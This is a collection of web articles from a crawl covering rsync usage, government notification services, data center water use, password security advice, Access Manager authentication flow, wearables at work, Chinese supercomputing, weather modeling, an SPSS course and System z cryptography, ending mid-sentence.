sent 1.21M bytes received 42 bytes 268.23K bytes/sec total size is 7.35M speedup is 6.09 The -h and -z arguments that we’ve added above will give us more human readable output during the copying process and ensure that files are compressed during transmission. Some file types -– such as files are already compressed, mp3, mp4, and jpg files – will not be compressed even with this option, presumably because little would be gained in the overall file size. Keep in mind, however, that when you elect to compress your files during transmission, you're trading CPU time (on both ends of the transfer) for network bandwidth. Unless your network is slow or very busy, you might not want to bother. So far, we’ve used the arguments shown below, but type rsync –help and rsync will gladly provide you with a list of its several pages worth of options and short descriptions of what they all mean. - a = archive mode (a combination of arguments that works for replication) - v = verbose - z = compress the file during the transfer - h = show numbers in human-readable format Another nice option that rsync offers is a feature called "dry run". Using the -n option or --dry-run, rsync will show you what it will do when you run the command for real. Just don't get too excited about the speedup figure as it will be grossly inflated since you're not actually moving files. $ rsync -av --dry-run bin remote-server:~sbob building file list ... done bin/ bin/checkStuff bin/checkm bin/chkBackups ... bin/vpn-users bin/warnings sent 3450 bytes received 704 bytes 1661.60 bytes/sec total size is 2243025 speedup is 539.97 With and without passwords Rsync will typically require passwords but, like ssh, allows you to run without being prompted if you’re set up to run ssh commands in password-free fashion like I am (i.e., if you’ve set up your ssh keys and authorized_keys files). This allows you to run rsync commands in hands-off fashion. For example, you can set up cron jobs that can greatly simplify the job of keeping important file collections synchronized. Closing thoughts on rsync … First, synchronization is definitely the best feature of this tool -- ensuring that both copies of a file or groups of files remain the same. There are numerous options that add to its flexibility. For example, if you remove a file from one system, you might or might not want rsync to remove the file from the remote system. You get to choose. In general, rsync is faster when the files already exist on the receiving side because it can transfer just the file differences. But, again, rsync has to exist on both of the systems involved in the synchronization. By default, rsync uses ssh. This means that you can trust it not to send your data over the wire insecurely. It also means that you can set it up to run unattended (e.g., using cron). While the copy as little as possible behavior of rsync is one of its more appealing characteristics, it’s really only one of many things rsync can do for you. In my next post, I'll provide some more complex rsync commands to demonstrate the many ways the command can be made to do just what you want. This article is published as part of the IDG Contributor Network. Want to Join?
<urn:uuid:126c1f62-5116-4fa9-9312-527fe2dd411e>
CC-MAIN-2017-04
http://www.computerworld.com/article/3039839/linux/synching-your-teeth-into-rsync.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284405.58/warc/CC-MAIN-20170116095124-00301-ip-10-171-10-70.ec2.internal.warc.gz
en
0.915225
1,889
2.84375
3
When the H1N1 "swine" flu epidemic broke loose in late April 2009, Americans clamored for information about the disease and its potential impact in their communities. Many local governments turned to their own Web sites and other means of digital communication to disseminate information. But simply placing a notice on a Web page or sending an e-mail isn't always sufficient. How can local governments be sure to provide the information citizens want and need in a timely fashion? And more importantly, as there may be overlap among different government departments and agencies, how can local governments be sure their citizenry can find the information they seek without difficulty? Oakland County, Mich., a community of 1.2 million residents in the state's southeastern corner, confronted these challenges head-on by implementing a new digital communication platform. The county is going even further by letting its municipalities use the service for free. The county uses a digital subscription service provided by GovDelivery. It plugs directly into an existing Web site and lets citizens sign up to receive notification via e-mail, RSS feed or text message when Web pages in specific categories are updated. For example, if a citizen were interested in being notified about swine flu, he could go to a general subscription sign-up page on a county's or municipality's Web site. There he can select from more than 40 categories, including a high-level category called Health Division, or underlying categories like Flu Information, Flu Shots or Pandemic Flu Preparedness. Whenever a Web page tagged with that category is updated - no matter what department, agency or level of government is providing that revised information - the citizen is immediately notified by e-mail with a link to the updated page. View Full Story
<urn:uuid:a3f7cc66-0268-4ed8-b4ed-894f0f07f206>
CC-MAIN-2017-04
http://www.govtech.com/e-government/Oakland-County-Mich-Shares-Notification-Service.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280308.24/warc/CC-MAIN-20170116095120-00027-ip-10-171-10-70.ec2.internal.warc.gz
en
0.936346
352
2.875
3
Energy is critical to data centers; rising prices, potential new regulations and taxes, and limited supply make it a topic that is foremost on the minds of both data center managers and industry observers. But another resource used heavily by data centers bears remembering: water. What should companies do about water when it comes to their data center facilities? Water Consumption a Concern All data centers consume energy, making energy the biggest concern for a variety of parties (companies, environmental groups and others) when it comes to resource usage. But water—although it is not used by all data centers—is another concern that is often overlooked. Water is a critical component of some data center cooling systems; large data centers using evaporative cooling, for instance, can consume hundreds of thousands of gallons of water a day. DatacenterDynamics (“Microsoft: we too use recycled water to cool data centers”) notes that Microsoft’s San Antonio data center consumes some eight million gallons of water per month: that’s about 250,000 gallons a day. A look at the U.S. Drought Monitor shows that the majority of the contiguous 48 states are under drought conditions, particularly those in the western and midwestern states, with a heavy patch of drought in Georgia and Alabama. Water supply is a perennial concern in the west, even when the region is not exceptionally dry. Large data centers with hefty water appetites can outstrip utilities’ ability to supply water, putting pressure on infrastructure and threatening availability of water to residents and companies that consume relatively small amounts. And these situations can quickly be exacerbated by drought conditions. Some data centers can and do operate without consuming much (if any) water. For these facilities, air-based cooling methods may be sufficient to prevent equipment from overheating. But for data centers with high-density deployments—such as those pursuing high-performance computing or that use blade servers and similar equipment—air cooling is often insufficient. In these cases, liquid-cooling methods are often more appropriate, as water (for instance) is better able to hold and move heat compared with air. Depending on the details of the cooling implementation, such facilities can consume large amounts of water. What Can Data Centers Do to Conserve Water? Companies that operate or plan to build data centers should keep water in mind as much as they do energy. Here are a few considerations that can aid in conservation and minimize the impact of data centers on the areas surrounding them. - Increase IT energy efficiency. Every watt of power consumed in your data center is converted into heat that must be removed to the outside environment. The less heat your facility produces, the less cooling you’ll need to do. Typically, savings in this area focus on reduced costs and energy consumption, but reduced water consumption is another area of savings for those data centers that employ liquid cooling. Greater energy efficiency is beneficial in a variety of ways, and saving water is one of them. - Consider alternative water sources. Water is (almost) everywhere, but potable water (the stuff that comes out of your tap) is a relatively precious resource. Some companies, such as Google, are instead turning to so-called grey water as a means of meeting their data centers’ need for water while reducing their impact on potable water supplies. Grey water is wastewater from sinks, tubs and similar uses that doesn’t contain human waste. Because it doesn’t require the same treatment as “brown water”—and because data centers do not need potable water—grey water that is cleaned up slightly can be used for cooling. This approach reduces the effort (and energy) needed to treat the water, aiding the utility and reducing pressure on potable supplies. Of course, it’s not quite as simple as running water from bathroom sinks directly into the data center (“Google cools data center with bathtubs, dishwashers”), and it may not be a good alternative for small companies running a data center, but it is a possibility for companies operating large facilities. Even seawater is a possibility for cooling (“Google to double seawater-cooled Hamina data center’s capacity”), although the salt content creates some technical challenges—such novel methods might best be left to companies like Google. - Improve cooling efficiency in the data center. Increasing IT efficiency is one way to decrease water consumption if you facility uses water-based cooling, but there are other steps you can take. Implement standard industry practices for better cooling efficiency: for instance, use hot-aisle/cold-aisle containment, ensure minimum mixing of hot air and cold air (e.g., plug open cable holes in cabinets) and ensure minimum obstruction of airflow. - Use free cooling. ASHRAE’s recently updated temperature and humidity guidelines enable many data centers to operate at higher temperatures, meaning less cooling is needed overall. Furthermore, these guidelines make free cooling a possibility for a larger portion of the year—all year long, in most locations (depending on the particulars of the IT equipment). Free cooling provides a host of benefits, including less cooling infrastructure (and hence lower capital costs), lower energy consumption and lower water consumption (thus reducing operating expenses). Although free cooling isn’t really free, it’s much less expensive than traditional cooling methods, and it can ease the pressure large data centers place on both electrical and water utilities. - Choose your location wisely. If you’re building a data center that relies heavily on water, you will naturally want to select a location where water is readily available. In addition to minding the risks to your business (e.g., the potential for drought and its possible effects on the water supply), consider the impact your facility will have on utilities and, thus, residents and other businesses. Check with utilities to determine if an alternative water source (like grey water) is a possibility. Stay on the good side of everybody as much as possible—you don’t want to earn a reputation as a water hog, particularly if a drought strikes. - Monitor your water efficiency. The less water you use, the more money you save; so keep track of how much water you’re using. Metrics like The Green Grid’s water usage effectiveness (WUE—similar to PUE, or power usage effectiveness) can help you monitor your data center’s water efficiency. Set goals for improved efficiency and work toward them. Water isn’t as flashy as energy, but it’s a critical component of many data centers, and it is just as important a resource. If your data center consumes water, you can take steps to improve your efficiency and cut costs as well; the key is to make water a priority, just like energy. Of course, efficiency improvements generally incur some costs, and weighing the costs relative to the benefits is a necessary part of the business. The current drought situation—particularly in the west and midwest—shows that water cannot be ignored. Whether you’re operating a data center or planning to build one, make water conservation a top concern, both for the sake of saving costs and for the sake of protecting a precious resource. Photo courtesy of dr_relling
<urn:uuid:aa865343-ccc3-41ef-8900-8fe1cd2ba857>
CC-MAIN-2017-04
http://www.datacenterjournal.com/dont-forget-about-water-in-your-data-center/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279915.8/warc/CC-MAIN-20170116095119-00541-ip-10-171-10-70.ec2.internal.warc.gz
en
0.938599
1,490
3.078125
3
According to Security Expert Bruce Schneier, frequent password changes are a bad security idea despite what all the experts keep telling us. In his a recent blog, Schneier states, “I’ve been saying for years that it’s bad security advice, that it encourages poor passwords.” According to Schneier, By studying the data, the researchers identified common techniques account holders used when they were required to change passwords. Schneier explains a password like “tarheels#1”, for instance (excluding the quotation marks) frequently became “tArheels#1” after the first change, “taRheels#1” on the second change and so on. Or it might be changed to “tarheels#11” on the first change and “tarheels#111” on the second. Another common technique was to substitute a digit to make it “tarheels#2”, “tarheels#3”, and so on. Schneier quotes Lorrie Cranor, the US Federal Trade Commission’s chief technologist,who recently stated at Passwords Con 2016 “The UNC researchers said if people have to change their passwords every 90 days, they tend to use a pattern and they do what we call a transformation,” Cranor explained. “They take their old passwords, they change it in some small way, and they come up with a new password.” The researchers used the transformations they uncovered to develop algorithms that were able to predict changes with great accuracy. Then they simulated real-world cracking to see how well they performed. In online attacks, in which attackers try to make as many guesses as possible before the targeted network locks them out, the algorithm cracked 17 percent of the accounts in fewer than five attempts. In offline attacks performed on the recovered hashes using superfast computers, 41 percent of the changed passwords were cracked within three seconds. You can read more from Bruce Schneier on his blog at www.schneier.com
<urn:uuid:d0e759d8-8bde-4eec-b043-7eb17548272d>
CC-MAIN-2017-04
http://www.securitysolutionsmagazine.biz/frequent-password-changes-is-a-bad-security-idea/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280900.71/warc/CC-MAIN-20170116095120-00265-ip-10-171-10-70.ec2.internal.warc.gz
en
0.965911
429
2.75
3
The following figure illustrates the components and process flow that make up a basic configuration. Figure 1-1 Basic Process Flow The user sends a request to the Access Gateway for access to a protected resource. The Access Gateway redirects the user to the Identity Server, which prompts the user for a username and password. The Identity Server verifies the username and password against an LDAP directory user store (eDirectory, Active Directory, or Sun ONE). The Identity Server returns an authentication artifact to the Access Gateway through the browser in a query string. The Access Gateway retrieves the user’s credentials from the Identity Server through the SOAP channel in the form of a SOAP message. The Access Gateway injects the basic authentication information into the HTTP header. The Web server validates the authentication information and returns the requested Web page. You configure the Access Manager so that a user can access a resource on a Web server whose name and address are hidden from the user. This basic configuration sets up communication between the following four servers. Figure 1-2 Basic Access Manager Configuration Although other configurations are possible, this section explains the configuration tasks for this basic Access Manager configuration. This section explains how to set up communication using HTTP. For HTTPS over SSL, see Section 2.0, Enabling SSL Communication.
<urn:uuid:72abec91-cac7-409c-a303-ae5e3d59b171>
CC-MAIN-2017-04
https://www.netiq.com/documentation/novellaccessmanager31/basicconfig/data/b5bvrkf.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00294-ip-10-171-10-70.ec2.internal.warc.gz
en
0.770379
269
2.921875
3
Wearable devices are one of the corporate favorites in IT and mobile industry today, especially with recent VR gadgets introduction in the gadget. Wearables are transitioning from trendy gadgets to useful technology. Such devices act as an additional screen for your smartphone. Doing tasks like telling time, giving notifications and running apps, the major details consists of the data you can collect from the sensors in the device. Opposite to the common belief, Wearables consists of actually three different styles: monocular, immersive, and wrist-worn. Many companies are introducing wearables in their wellness programs to make them a success. Sensors analyze time and type of activity that are involved in completing a task, and provide the companies more information. The activity-tracking bands track how many steps you take, how many calories you burn, heart rate and other health and wellness statistics. As of now, fitness-tracking wearables are extremely popular for consumers but user interest in the device usually fades after the three-to-four month whereas in the corporate world, wearables are taking on vital roles in companies every day. Organizations being large or small have been steadily embracing BYOD in lieu of cost savings and increased productivity as their primary motives but risk to sensitive data overcome the benefits. It is logical that most of the people who bring their laptops to use at work usually connect to the company’s WiFi network. This causes the companies to run into wireless network bandwidth performance problems as a single Wi-Fi connection can support 15-20 devices providing good speed to each connection. If more than that number is connected, the connection signal strength begins to deteriorate. This opens the possibility of network instability. Increasing exposure to malware and viruses due to lack of control into personal devices accessing the network has put the security of company’s confidential data at stake. Use of wearables at workplace In a corporate culture which is always on, smart watches, glasses and other wearable digital gadgets act for improving worker wellness and productivity. In a survey sponsored by the software company Cornerstone OnDemand, 66% of U.S. working population responded that they will positively use wearable in corporate culture. People who were reluctant in using the digital gadgets can be motivated by offering monetary benefit such as reduced health insurance premiums or discounted exercise programs. Smartwatches and glasses, such as the Apple Watch and Google Glasses are known for their personal assistant features alongside fitness tracking. Advantages of BYOD The trend of using own device at work can make it easier for workers to accomplish their tasks. Companies have introduced simple and light weight mobile applications that allow employees to access and share corporate data more smoothly. Users can work at their convenience from anywhere. BYOD can even minimize usage of different applications if workers take advantage of the apps available. It is logical enough to expect that there will be objections and privacy and security are issues of primary concern. Most of the employees will not be comfortable with the fact that management is having access to all of their data. The devices can save photos, record vital signs, or track movement. Of course, not many employees want to wear a fitness band or smartwatch. These advances affect every aspect of human lives both at work and play. This rapid technological advancement leaves us wondering if the changes which the new technology brings are only positive. Texting and email affect our verbal and written communication skills. Corporate Risks involved in BYOD primarily include – • Malicious Code • Device Attacks Most of the apps across all wearable platforms fail basic security tests. Additional efforts by the Employer IT can expect increased support costs associated with BYOD for helping employees compliant with the corporate policies and federation laws. Developers will require help of device admins to help plan and implement apps on the devices which are different in make and configuration, and admins will have to simultaneously ensure that the devices should not put corporate resources at risks. IT of the company must also be prepared for the additional pressure on the corporate infrastructure which they get from personal devices connecting to their internal systems. If you are letting workers store sensitive data on their own devices the risk of corporate data is at risk if a device is lost, stolen or infected with malware. When an employee leaves the company along with the device, the organization might be unable to reclaim sensitive data. Even if workers use their own devices, the organization must ensure that the data is protected as required by regulation and law wither through RSA or VPN or security certificates. The enterprise must also understand the liability, if sensitive data is compromised. With immersive gadgets like VR headsets and smart glasses being introduced, corporate trainees can indulge in the training and the presentations which keeps the interest in the content. In cutting edge corporate world, employees need immediate access to corporate manuals, training materials, or tutorials that can give them a step-by-step walkthrough of a specific task or help the customer virtually. Wearables give them instant access and convenience to customer as well. Training and induction cost to the company is reduced as well as number of training programs are reduced as the employees have instant access to all the online content and documentation. Using wearable technology in corporate strategy can reduce costs and increase productivity. However, any device that records any kind of data like audio, video could be a threat to co-workers privacy and business security. Employers need to gain their employees trust and be transparent about how the gathered employee data will be used. One thing businesses should be doing is to restrict the use of wearables devices at work and monitor them if they are connecting to corporate networks. The policy of the company should protect the privacy of the individual and the privacy of the corporation.
<urn:uuid:6299fa94-c624-4f7f-a803-19b496ada455>
CC-MAIN-2017-04
https://www.hexnode.com/blogs/wearables-at-workplace/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282935.68/warc/CC-MAIN-20170116095122-00504-ip-10-171-10-70.ec2.internal.warc.gz
en
0.955233
1,144
2.640625
3
Start off the New Year With Safe Online Computing Recent polls conducted by the Pew Research Center found that 73 percent of Americans go online on a daily basis. And one out of five Americans report going online "almost constantly." With all that time on the internet, we wanted to share a few more tips to help keep your time online safe: - Avoid searching for celebrity gossip. Malware authors know that people naturally gravitate toward gossip and plan new attacks specifically targeting people looking for gossip. - Avoid file-sharing sites dealing with copyrighted material, as they can open you up to potential hacker targeting. - Don’t do online gaming. Many of these sites sneak adware onto your PC, and some are fronts for identity theft rings. - Set your Facebook privacy settings so they are not “open.” If you enter your birthdate, location or even your phone number without changing the privacy setting, your information could be seen by everyone. - Never connect to unknown wireless networks. In public places like airports and hotels, be careful about logging in, as people can eavesdrop. - Do not use the “save my password” feature. Although it is a convenient feature, anyone using your computer can then access the site with your password. Check out our CenturyLink Security Blog for more online safety tips.
<urn:uuid:b90a369c-8f72-47f5-a6d7-d52bb2e4f2f0>
CC-MAIN-2017-04
http://news.centurylink.com/blogs/security/start-off-the-new-year-with-safe-online-computing
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280825.87/warc/CC-MAIN-20170116095120-00468-ip-10-171-10-70.ec2.internal.warc.gz
en
0.91327
273
2.65625
3
Anyone who hasn’t noticed the ascendency of China in high-tech has probably been sleeping in a cave since about 2005. Assuming you are at least a casual reader of HPCwire, then you’re already well aware of the rise of Chinese supercomputing over the past few years. But it doesn’t stop there. The country is determined to become a technology superpower. Certainly China has been on a fast track to supercomputing stardom. Although still number two to the US in sheer numbers of supercomputers, the Asian nation currently has 74 systems on the TOP500 list, including the number 2 (Tianhe-1A) and number 4 (Nebulae) machines. Five years ago, they had just 18 such systems, and none in the top 10. More recently, China designed and built the Sunway BlueLight MPP supercomputer, a petaflop-capable system, using home-grown CPUs. More indigenously produced HPC machines are on the way as companies like Lenovo and Dawning ramp up their penetration of the domestic market. The larger story of China’s high-tech rise is being taken up by the mainstream media. For example, the New York Times this week reported that China “will soon have the world’s largest domestic market for both Internet commerce and computing.” That local market is driving innovation up and down the computer food chain. Some of the innovation resembles that of Silicon Valley, where fast-growing startups and a workaholic culture are fueling a growing influx of venture capital– $7.6 billion today, up from $2.2 billion in 2005. At the same time, Chinese patents are being issued at a breakneck rate, overtaking that of South Korea and Europe and catching up with the US and Japan. But, as the NYT piece reports, some innovation there takes a different form. According to Clyde Prestowitz, president of the Economic Strategy Institute, in China, much of the new technology is based on continuous improvement, something, Prestowitz says, the US and Westerners are less adept at. For example, two homemade Chinese CPUs — the ShenWei SW1600 used in the Sunway BlueLight super, and the Godson-3B processor that will power an upcoming Dawning system — are based on RISC designs originally developed in the US. But both chips, the NYT article points out, are among the most efficient in performance-per-watt, which is becoming the critical metric for supercomputing. As IDC pointed out during a presentation last month at SC11, the Chinese are investing heavily in HPC, including the supercomputer centers themselves. Here the country intends to have a least 17 petascale-capable facilities within the next five years, which would rival that of the US and Europe. None of this is escaping the notice of the HPC community. The Times article quotes Donna Crawford, the associate director of computation at the Lawrence Livermore National Laboratory, who notes, “The overall point of all of this is that the Chinese understand the importance of high-performance computing.” That’s not to say China is a high-tech utopia. They’re still behind their competition on semiconductor technology (three generations, according to the NYT article). And the lack of intellectual property protection may discourage entrepreneurs looking to maximize profit from specific inventions. But China has started churning out hardware and software engineers in tremendous numbers, some of which are being trained at the best engineering schools in the world, like UC Berkeley and MIT. It is these engineers that will form the next wave of Chinese tech innovators in their country. Let loose in the largest domestic technology market in the world, this next generation of techies may well create the next Silicon Valley.
<urn:uuid:6ac7082e-a169-4b62-90c5-53b75cf11894>
CC-MAIN-2017-04
https://www.hpcwire.com/2011/12/08/china_flexes_high-tech_muscles/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281151.11/warc/CC-MAIN-20170116095121-00376-ip-10-171-10-70.ec2.internal.warc.gz
en
0.946577
790
2.53125
3
Auditing Specific Events - Page 2 As you can see, you can audit quite a few actions. Because some of the actions may be a bit unclear, and because other actions aren't listed in the figure, I'll describe each action: - Traverse Folder/Execute File--In the case of a folder, this event is triggered when a member of the group tries to pass through the folder in an attempt to reach a subfolder or parent folder. If this window were for a file, the event would be triggered if a member of the group tried to run the program. - List Folder/Read Data--In the case of a folder, the event is triggered when a member of the group tries to view the contents of the folder. In the case of a file, the event is triggered when a member of the group tries to read data from within the file. - Read Attributes and Read Extended Attributes--This event is triggered when a member of the group tries to display the attributes (or extended attributes) of the file or folder. - Create Files/Write Data--This event is triggered when a member of the group tries to create files in the folder or add data to the file. - Create Folders/Append Data--This event refers to the condition in which a member of the group either creates a subfolder within the existing folder or appends data to the end of the file without overwriting any of the file's existing data. - Write Attributes and Write Extended Attributes--These events refer to a member of the group trying to change the file or directory's attributes or extended attributes. - Delete Subfolders and Files--This event is triggered when a member of the group deletes a file or subdirectory within an audited directory. - Delete--The Delete action is logged when a group member tries to delete a file or folder. - Read Permissions--This event is logged when a group member tries to see who has permissions to a file or folder, or if the group member tries to determine the owner of the file or folder. - Change Permissions--This event is logged when a group member tries to change who has access to a file or folder. - Take Ownership--The Take Ownership event is triggered when a group member attempts to take ownership of a file or folder. Remember that you can audit either successes (for example, the file was deleted) or failures (Bob tried to delete a file) or both for any event. In Part 4 of this series, I'll continue the discussion by talking about auditing Active Directory objects. // Brien M. Posey is an MCSE who works as a freelance writer. His past experience includes working as the director of information systems for a national chain of health care facilities and as a network engineer for the Department of Defense. Because of the extremely high volume of e-mail that Brien receives, it's impossible for him to respond to every message, although he does read them all.
<urn:uuid:0de07056-5244-40e7-8e23-81cd3125eb2a>
CC-MAIN-2017-04
http://www.enterprisenetworkingplanet.com/netsecur/article.php/10952_624931_2/Auditing-Specific-Events.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00192-ip-10-171-10-70.ec2.internal.warc.gz
en
0.956839
614
3.0625
3
I’m not as smart as a bot. I know this because stories are floating around the blogosphere today about how CAPTCHAs, those annoying word puzzles you have to solve before you’re allowed to do stuff on many websites, are easy to crack. Maybe so. But I can't crack them. (CAPTCHA, by the way, stands for Completely Automated Public Turing test to Tell Computers and Humans Apart. It was developed at Carnegie Mellon University and acquired by Google in 2009. "Turing test" refers to the standard set in 1950 by British mathematician Alan Turing in 1950: a machine can be deemed intelligent only if its performance is indistinguishable from a person's.) Countless times I’ve been on the verge of buying a baseball ticket or posting a comment, only to be locked out because I can’t read the strange CAPTCHA hieroglyphics. Thankfully, Google, the keeper of the virtual key that is CAPTCHA, has decided to simplify the system so ordinary humans can crack the code and get to the ball game on time. In a post on Google’s security blog, CAPTCHA product manager Vinay Shet says his team has figured out a way to make the puzzles significantly easier for people to solve, while still filtering out bots. Instead of puzzles made of letters that look like the one below, the new CAPTCHAs will contain a series of numbers that are much easier to read, like the second image below. "Bots, on the other hand, will see CAPTCHAs that are considerably more difficult and designed to stop them from getting through," writes Shet. The new-style CAPTCHAs are already starting to appear, and you'll see more in the future as Google continues to roll them out. Sounds good, right? But there's one the part I don’t understand. Shet says that when the software determines the entity attempting to engage with the protected page is a machine, CAPTCHA serves up a difficult puzzle. If it determines that the entity knocking on the door is a human, it serves a simpler puzzle. That raises an obvious question: If the software already knows a machine is trying to gain access, why bother with a puzzle? I reached out to Google for some insight, and if I hear back, I’ll update this post.
<urn:uuid:49fdd32b-4a60-4916-9898-ca0e42713383>
CC-MAIN-2017-04
http://www.cio.com/article/2370240/internet/google-s-new--simpler-captcha-coming-at-ya.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00010-ip-10-171-10-70.ec2.internal.warc.gz
en
0.956633
489
2.578125
3
A recent feature piece from the Texas Advanced Computing Center (TACC) explores the relationship between the rise of powerful supercomputers and advances in weather forecasting. The most accurate atmospheric models accommodate a host of variables that can affect weather patterns. Heat, radiation, and the rotation of the Earth are just a few of the many factors that must be taken into account. The data is collected and converted into mathematical formulae, which the computers transform into weather forecasts. For some time, climate forecasts were limited to so-called global weather models, which have a resolution of 100 kilometers (km) per grid-point. Despite being the current standard upon which all official predictions are based, such models lack granularity and may omit significant details. For example, two towns that are nearby each other, one on a hill and the other in a valley, will be shown as having the same weather experience, when in reality there may be subtle, or not so subtle, differences. Masao Kanamitsu, an expert in atmospheric modeling and a leading researcher at Scripps Institution of Oceanography, is working on creating more precise weather models. Kanamitsu’s experience goes back to the mid-1990s when he ran climate models using Cray supercomputers and Japan’s Earth Simulator. Nowadays, he uses the Ranger supercomputer at the Texas Advanced Computing Center. To improve regional predictions, Kanamitsu and others working in the field use a process called downscaling. According to the article, the “technique takes output from the global climate model, which is unable to resolve important features like clouds and mountains, and adds information at scales smaller than the grid spacing.” Kanamitsu is using downscaling to improve microclimate forecasts in California. By integrating additional factors — like topography, vegetation, and river flow — into the subgrid of California, Kanamitsu is achieving a resolution of 10 kilometers (km) with hourly predictions. The method’s ability to fine-tune local forecasts using global data points seems counterintuative, a sentiment that seems to be shared by Kanamitsu. He states: “We’re finding that downscaling works very well, which is amazing because it doesn’t use any small-scale observation data. You just feed the large-scale information from the boundaries and you get small-scale features that match very closely with observations.” The work requires the powerful capabilities of systems like Ranger at TACC, which excels at producing long historical downscaling in a short period of time. Kanamitsu’s climate simulations have even outperformed those of the National Weather Service, and were the topic of 10 papers in 2010.
<urn:uuid:8b6429a5-0d48-485a-a005-f1ea9c3051da>
CC-MAIN-2017-04
https://www.hpcwire.com/2011/03/01/ranger_supercomputer_supports_microclimate_forecasting/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280504.74/warc/CC-MAIN-20170116095120-00404-ip-10-171-10-70.ec2.internal.warc.gz
en
0.934235
561
3.921875
4
In this course, you will learn about the fundamentals of using IBM SPSS Statistics for typical data analysis process. You will learn the basics of reading data, data definition, data modification, and data analysis and presentation of analytical results. You will also see how easy it is to get data into IBM SPSS Statistics so that you can focus on analyzing the information. In addition to the fundamentals, you will learn shortcuts that will help you save time. This course uses the IBM SPSS Statistics Base features.
<urn:uuid:d129cac1-5e88-47da-ac73-7bff7161f3b4>
CC-MAIN-2017-04
https://www.globalknowledge.com/ca-en/course/120277/introduction-to-spss-statistics/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281659.81/warc/CC-MAIN-20170116095121-00128-ip-10-171-10-70.ec2.internal.warc.gz
en
0.858464
109
2.765625
3
While your company may not have to deal with compliance fines like HIPAA if you’re breached, the fact remains that data security is vital knowledge for your employees. The Target and Home Depot breaches cost those large corporations millions of dollars, but even small companies can come shuddering to a halt if they suffer a breach. Some basic training and password security can help you avoid losing access to the data and systems that keep your business running. Read on to see the biggest password mistakes we see regularly, plus some tips on crafting (and remembering) strong, unique passwords. Comic from XKCD Ok, ok—pretty much everyone knows not to use “password” as his or her password (or at least, you’d think they do—studies regularly find that the most common passwords are things like “123456” or “abc123”). But even if you include capital and lowercase letters, plus a number or a special character, chances are your password is easy to crack. Here are some of the biggest password mistakes we see people make regularly. Using information that is close to your heart Don’t use the name of a relative or anything else closely related to yourself. If the information is easy to discover, it’s easy to guess. This goes for your security questions, too—you don’t need to tell the truth for them. Chances are a hacker can find out your childhood address or even your first car and use that information to reset your password. Using a simple word or keyboard order Don’t simply use a word or type in the order of your keyboard (like “qwerty” or “ghjkl”). These are very easy to crack with a “dictionary attack”—supremely common cracking tools. However, a string of words or even a complete sentence with capitalization, spaces, and punctuation, makes a great password. Common substitutions for letters are also easy to guess, so just replacing the “a” in Amy123 with @my123 isn’t going to add much security at all. Reusing the same password Yeah, it’s a bit of a hassle to remember a dozen passwords, but keeping the same code for your e-mail, bank, and Facebook means that if someone gains access to one account, they gain access to them all. Writing down your password and keeping it near your computer You made a complex password—it’s long, it has a mix of upper and lowercase letters, and you threw in some special characters. Great! Now you can’t remember it. So you (understandably) wrote it down, along with your other dozen passwords, and stuck it under the keyboard. Bad move. It’s OK to write it down, but keep it elsewhere, write down hints instead of the actual password, or better yet, try out a password manager tool. Now that you know what not to do, here’s how can you create a password that is strong but still memorable, plus some other tips for password safety. Use a password manager Password managers help you create strong passwords and then encrypt and store your login credentials for various applications and websites, so the only password you need to remember is your login to the password manager itself. Make sure your password manager password is strong. Make it long without resorting to random characters Use a minimum of eight characters as well as a mix of character types. While it does create a much stronger password, without a password manager it’s going to be pretty hard to recall 7*wUitNf$AnR! every time you need to login to Outlook. Instead try spelling a phrase creatively, like “tAke_mE2-uR_LeADr”. Or to make it even easier to remember, just type a sentence! Including spaces, if they are allowed by the website or application, actually increases security. You can also substitute underscores and dashes for the spaces. A sentence or silly nonsensical phrase like “I-fell-asleep-beneath-the-flowers.” or “mountaindewslurpingcats” can actually be harder to crack than a shorter password, even with uppercase letters, numbers, or special characters. Take advantage of two factor authentication If it is available, make sure to enable multi-factor or two-factor authentication. Many bank sites include this method, which adds a second step beyond just your password, like a security phrase or image. If you know other employees, your team mates, your subordinates, or even your relatives are using insecure passwords or storing them in plain sight, go ahead and be a nag about it. You could save them personal trouble, and you could save your company the hassle, expense, and reputation hit of a security breach. Posted by: Systems Engineer Jim Taylor
<urn:uuid:f3f7f9e5-b64b-4cd6-ac2a-76b3627b6f0e>
CC-MAIN-2017-04
https://www.greenhousedata.com/blog/dont-leave-your-digital-keys-under-the-mat
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00248-ip-10-171-10-70.ec2.internal.warc.gz
en
0.926516
1,037
2.78125
3
Cryptography can take many forms. It can be used to protect data in flight or data at rest, to authenticate a user, or provide a digital signature for banking or finance applications. Cryptography provides the building blocks applications use to protect the intellectual property that differentiates one customer from another. Over the years, as Linux on System z has taken on a strong leadership role with Web- and Internet-facing applications, the value of Java and access to cryptography from Java has become paramount. Since Java is the most widely used language for Web applications, these applications have assumed the roles of protecting the confidentiality and integrity of data in the enterprise and the authentication of users and their authorization to various functions or data. Hardware cryptography available on System z brings added business value to Java applications when running on Linux. The Crypto Express3 or Crypto Express4 cards in accelerator mode can provide cost-saving offload options, freeing up the processor to do other work as well as yielding drastic improvements in speed. The Central Processor Assist for Cryptographic Function (CPACF) capabilities, also available to Java applications, provide additional savings in processing time, which means better overall application throughput and cost savings. Banks and financial institutions can take advantage of the robust secure key and banking functions available on the Crypto Express3 and Crypto Express4 cards in coprocessor mode. Writing a Java program that uses cryptographic functions from a library that exploits the System z cryptographic hardware can seem complex. It involves several components that must work together: the Linux kernel with a crypto device driver, System z-specific crypto libraries, openCryptoki with specific tokens, the Java Cryptography Architecture (JCA) with the Java Cryptography Extension (JCE) Application Program Interface (API) and the appropriate Java provider. Here we demonstrate how to set up Linux on System z for an application to exploit 